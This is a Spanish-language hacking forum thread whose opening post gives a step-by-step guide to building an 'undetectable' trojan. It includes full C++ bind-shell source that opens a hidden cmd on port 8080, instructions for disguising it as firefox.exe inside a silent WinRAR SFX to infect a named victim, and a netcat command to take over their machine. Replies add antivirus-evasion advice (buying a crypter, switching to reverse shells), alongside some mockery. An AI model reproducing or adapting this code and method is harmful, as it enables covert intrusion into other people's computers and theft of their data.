Troyano en C++ indetectable!!

Iniciado por Grillet0xEB, 18 Enero 2014, 15:25 PM

0 Miembros y 1 Visitante están viendo este tema.

Grillet0xEB

Les traigo como hacer un troyano intetectable

1. Se bajan un programa llamado "DEV C++" que utilizaremos para crear nuestra shell ( si no sabes que es no importa sigue leyendo).

2. Ahora que ya está instalado buscamos por internet cualquier código que se llame "win32 bind shell" y luego creamos un nuevo proyecto con nuestro dev cpp, le decimos que será "windows mode" o modo ventana y le pegan el código encontrado:
Troyano casero indetectable

Si no encontraron nada no importa, acá les traigo una:

Código:
Citar
#include <winsock2.h>
#pragma comment(linker,"/ENTRY:WinMain"

int WINAPI WinMain(HINSTANCE , HINSTANCE , LPSTR ,int ){

STARTUPINFO si;
struct sockaddr_in sa;
PROCESS_INFORMATION pi;
int s;
WSADATA HWSAdata;
WSAStartup(0x101, &HWSAdata);

s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);

sa.sin_family = AF_INET;
sa.sin_port = 0x901F; // (USHORT)htons(8080);
sa.sin_addr.s_addr= 0x00; // htonl(INADDR_ANY);

bind(s, (struct sockaddr *) &sa, 16);
listen(s, 1);
s= accept(s,(struct sockaddr *)&sa,NULL);

si.cb = sizeof(si); // 0x44;
si.wShowWindow = SW_HIDE; // 0x00
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; // 0x101
si.hStdInput = si.hStdOutput = si.hStdError = (void *) s;

si.lpDesktop = si.lpTitle = (char *) 0x0000;
si.lpReserved2 = NULL;

CreateProcess(NULL ,"cmd",NULL, NULL,TRUE, 0,NULL,NULL,(STARTUPINFO*)&si,&pi);
}



Esta shell está programada para dejar un puerto abierto en el 8080, ahora debemos darle propiedades al proyecto y donde dice "argumentos" les saldrá un rectángulo al lado derecho y le pegan esto:
Cita:

Citar
../../../../Dev-Cpp/lib/libws2_32.a
../../../../Dev-Cpp/lib/libwsock32.a

Ahora le dan click en el botón que dice "compilar" y les generará su backdoor o troyano.

indetectable a:

AhnLab-V3 2011.05.08.00 2011.05.07 -
AntiVir 7.11.7.176 2011.05.06 -
Antiy-AVL 2.0.3.7 2011.05.08 -
Avast 4.8.1351.0 2011.05.07 -
Avast5 5.0.677.0 2011.05.07 -
AVG 10.0.0.1190 2011.05.07 -
BitDefender 7.2 2011.05.08 -
CAT-QuickHeal 11.00 2011.05.07 -
ClamAV 0.97.0.0 2011.05.07 -
Commtouch 5.3.2.6 2011.05.07 -
Comodo 8619 2011.05.08 -
DrWeb 5.0.2.03300 2011.05.08 -
eSafe 7.0.17.0 2011.05.05 -
eTrust-Vet 36.1.8312 2011.05.06 -
F-Prot 4.6.2.117 2011.05.08 -
F-Secure 9.0.16440.0 2011.05.08 -
Fortinet 4.2.257.0 2011.05.08 -
GData 22 2011.05.08 -
Ikarus T3.1.1.103.0 2011.05.07 -
Jiangmin 13.0.900 2011.05.05 -
K7AntiVirus 9.102.4584 2011.05.06 -
Kaspersky 9.0.0.837 2011.05.08 -
McAfee 5.400.0.1158 2011.05.08 -
McAfee-GW-Edition 2010.1D 2011.05.07 -
Microsoft 1.6802 2011.05.07 -
NOD32 6103 2011.05.07 -
Norman 6.07.07 2011.05.07 -
Panda 10.0.3.5 2011.05.07 -
PCTools 7.0.3.5 2011.05.06 -
Prevx 3.0 2011.05.08 -
Rising 23.56.05.03 2011.05.07 -
Sophos 4.65.0 2011.05.07 -
SUPERAntiSpyware 4.40.0.1006 2011.05.08 -
Symantec 20101.3.2.89 2011.05.08 -
TheHacker 6.7.0.1.189 2011.05.06 -
TrendMicro 9.200.0.1012 2011.05.07 -
TrendMicro-HouseCall 9.200.0.1012 2011.05.08 -
VBA32 3.12.16.0 2011.05.08 -
VIPRE 9218 2011.05.08 -
ViRobot 2011.5.7.4450 2011.05.07 -
VirusBuster 13.6.342.0 2011.05.07 -

antivirus infalible aun no existe, cuando exista me avisan para usarlo.

3.
Ahora que ya tenemos nuestro troyano indetectable no se lo podemos pasar así como así a la persona que se va a infectar, lo debemos ocultar con algo y para eso utilizaremos WINRAR, lo descargamos, lo instaladmos y cuando esté listo debemos conseguirnos cualquier programa, de lo que sea pero que se ejecute en un solo archivo, esto es para que cuando se ejecute el troyano también se ejecute ese programa y no levante sospechas.

Ahora para hacer todo mas fácil renombro ese programa a firefox.exe solamente ( si ustedes no pueden ver el .exe del programa no le pongan .exe otraves)

Ahora solo deben seleciconar el troyano mas el firefox y darle click donde dice "añadir al archivo", le damos click donde dice crear archivo autoejecutable o SFX y en opciones le damos en ocultar todo y en ejecución le decimos esto:

Citar
cmd /c bpid.exe && firefox.exe

Ruta de extracción le ponemos %homepath% para prevenir que nos salte el UAC de window 7

Ahora le damos en aceptar todo y tenemos nuestro archivo, si quieren ponerle íconos personalizados pueden buscar cualquier tutorial de como usar winrar autoejecutables.

4.
Ahora le damos ese archivo a la persona que vamos a infectar y cuando lo ejecute dejará un puerto abierto que es el 8080 y nos conectamos desde netcat:

Citar
nc -v IP_ACA 8080

y ya, nos saldrá la consola de su pc y ya con eso podemos hacerle de todo, mover archivos, subir o bajarle cosas etc y todo 100% indetectable.

Espero les haya gustado  ;D
Grillet0xEB ;)

MixGammers

Amigo , tengo un spyware , generado por spynet, como lo podria hacer indetectable a ningun antivirus ? , espero respuestas con ansia

x64core

Cita de: MixGammers en 19 Enero 2014, 17:55 PM
Amigo , tengo un spyware , generado por spynet, como lo podria hacer indetectable a ningun antivirus ? , espero respuestas con ansia
Comprando un crypter

Vaagish

CitarAhora le damos ese archivo a la persona que vamos a infectar y cuando lo ejecute dejará un puerto abierto que es el 8080 y nos conectamos desde netcat:

Lo jodido es saber la ip, si no sabemos en que momento va a abrir el programa.. no?

Vaagish

CitarExcepción no controlada en 0x75BA70F4 (kernel32.dll) en Win32Project1.exe: 0xC0000005: Infracción de acceso al escribir en la ubicación 0x01282086.

AngelFire

#5
Hola gracias por compartir tu código y experiencia con el foro. Te diré que logré compilarlo en DEV-C++ 4.9.9.2 bajo Windows Xp Pro Sp3 Español con las recomendaciones de:

Opciones de Proyecto>Parámetros>Linker ../Dev-Cpp/lib/libws2_32.a y ../Dev-Cpp/lib/libwsock32.a.

También resulta fácil cambiar el puerto 8080 0x901F con cualquier convertidor de decimal a hexadecimal siendo para el puerto 4444 0x5C11.
Luego de esto podemos correr nuestro ejecutable compilado y en una consola cmd hacer netstat -nabo >1.txt veremos que el puerto 8080 abierto por nuestro ejecutable sin problemas 0.0.0.0 8080.
Pero tenemos varios inconvenientes, al realizar la conexión, uno es que no sabemos cuando la victima lo ejecutara por lo que quizás sea mejor buscar variantes sobre reverse_tcp considerando que la mayoría usa firewall que monitorean mas las conexiones entrantes que las salientes, el ejecutable no corre en modo oculto así que solo sirve para fines educativos  y finalmente al realizar la conexión con nc -vv 192.168.0.10 8080 al server se cerrará devolviendo el error
Warning: forward host lookup failed for xxx.xxxx.net: h_errno 11004: NO_DATA
xxx.xxxx.net [192.168.0.10] 8080 (?) open.

Entonces nada tenemos una base al parecer pero debemos seguir trabajando en ella para lograr mas. Quizas alguien se sume y de algunas soluciones o simplemente agregue su experiencias al probar el codigo.

Saludos

xaps

Cita de: MoonShadow en 18 Enero 2014, 15:25 PM
1. Se bajan un programa llamado "DEV C++" que utilizaremos para crear nuestra shell ( si no sabes que es no importa sigue leyendo).

2. Ahora que ya está instalado buscamos por internet cualquier código que se llame "win32 bind shell" y luego creamos un nuevo proyecto con nuestro dev cpp, le decimos que será "windows mode" o modo ventana y le pegan el código encontrado
Claro que si, con un par. Para que crear nuestros propios códigos si podemos usar el código de otro sin ni siquiera saber que estamos haciendo. Esa es la filosofía. Les felicito.
"The programmers of tomorrow are the wizards of the future" - Gave Newel

engel lex

apoyo a xaps... XD te apuesto a que si no dices como conectarse los que lo copian, ni lo sabrán... solo empezando con

CitarSe bajan un programa llamado "DEV C++"
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Gh057

Jajajajaja claro, lo que pasa es que cuando le das el archivo, ya que estás le preguntas su ip, corres a tu pc y te conectas...! ufff.... lammer detected...
4 d0nd3 1r4 3l gh057? l4 r3d 3s 74n v4s74 3 1nf1n1t4...

noopynoob